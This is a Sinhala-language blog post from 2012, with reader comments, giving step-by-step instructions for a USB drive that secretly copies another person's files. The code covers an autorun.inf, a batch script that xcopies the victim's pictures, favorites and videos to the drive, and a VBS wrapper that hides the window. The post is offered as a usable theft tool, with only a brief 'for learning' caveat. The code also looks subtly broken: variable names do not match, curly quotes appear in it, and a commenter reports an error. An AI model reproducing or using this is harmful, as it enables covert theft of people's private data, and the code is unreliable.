සයිබර් ආරක්ෂාව තේරෙන සිංහලෙන්

Monday 6 August 2012

Steel Someone Secret File Using USB Flash Drive

කතෘ අයිතිය සුරකින්න..!
ඔන්න ඉතින් තවත් පෝස්ට් එකක්..මේක ටිකක් අමුතු වැඩක්. කරලම බලමු. මේ කියන්න් යන්නෙ යූස්බී එකක් පවිච්චි කරල කොහොමද වෙන කෙනෙක්ගේ දත්ත උස්සන්නේ කියලා. හොරකන් කරන එක් නම් ඒ තරම් හොද දෙයක් නෙමෙයි.. ඒ හින්දා ඉගෙන ගැනීම සදහාම මේවා පාවිච්චි කරන්න.

හරි, අපි වැඩේ පටන් ගමු මුලින්ම නෝට්පෑඩ් එකක් ඕපන් කරගෙන මේ කෝඩ් එක ලියගන්න.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


ඊලගට මේක autorun.inf ආකරයෙන් සේවු කරගන්න.
ඊලගට ආයෙමත් නෝට්පෑඩ් එකක් ඕපන් කරගෙන මේ කෝඩ් එක ලියගන්න.

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls 


මේක file.bat ආකරයෙන් සේවු කරගන්න. දැන් අපිගාව පයිල් දෙකක් තියනවා. මේ කෝඩ් එක හොදට බලන්න. මේකේ  “%USERPROFILE%\pictures” කියන්නෙ අපිට කොපි කරගන්න ඕනේ ෆයිල් තියන ස්තානය.  “%drive%\all\My pics” කියන්නෙ ඒවා කොපි වෙන තැන. ඉතින් මේවා වෙනස් කරලා ඔයාලට ඕනේ දේවල් ඇතුලත් කරල මේ ෆයිල් එක සේවු කරගන්න. all කියලා පෝල්ඩරයක් හදගන්න වෙනවා පෙන් එක ඇතුලේ. 

ඊලගට ආයෙමත් නෝට්පෑඩ් එකක් ඕපන් කරගෙන මේ කෝඩ් එක ලියගන්න. ලියගන්නවටත් වඩා හොදයි කොපි කරලා පේස්ට් කරගන්නවා නම්. 

CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

මේක invisible.vbs ආකරයෙන් සේවු කරගන්න.

ආයෙමත් නෝට්පෑඩ් එකක් ඕපන් කරගෙන මේ කෝඩ් එක ලියගන්න.

wscript.exe \invisible.vbs file.bat

මේක launch.bat ආකරයෙන් සේවු කරගන්න. දැන් ෆයිල් 4ක් අපි ගාව තියනවා. හරි, මේ ෆයිල් ඔක්කොම ටික පෙන් එකට කොපි කරන්න. පෙන් එකේ all කියලා පෝල්ඩරයක් හදගන්න අමතක කරන්න එපා. දැන් ඔක්කොම හරි, පෙන් එක ගහල ටෙස්ට් කරලා බලන්න... සුබ දවසක්..!  
Share:

3 comments:

Unknown said...

meken karanne adala PC 1ke "pictures,videos" wage folders wala Data copy weemakne....api kemathi folder 1ka data copy karaganna puluwan widihata me code 1 modify karanne kohomada?

Admin -Help IT Lanka said...

mulin thiyana code eke USERPROFILE%\pictures”%drive%\all\My pics” kiyana path eke %drive%\all\My pics” walata oyaata copy karaganna one folder eka tiyana path eka denna

Anonymous said...

mchn meke bn .vbs kiyana file eke error ekek enawane bn...mekata udawwak dennako

Social Media

About Author



Eranda Dayawansa
Founder and Editor-in-Chief of 'Cyber Security'. Microsoft Certified ICT Instructor, Cyber Security Analyst, Information Security Researcher

Blog Archive

About

Followers

Blog Archive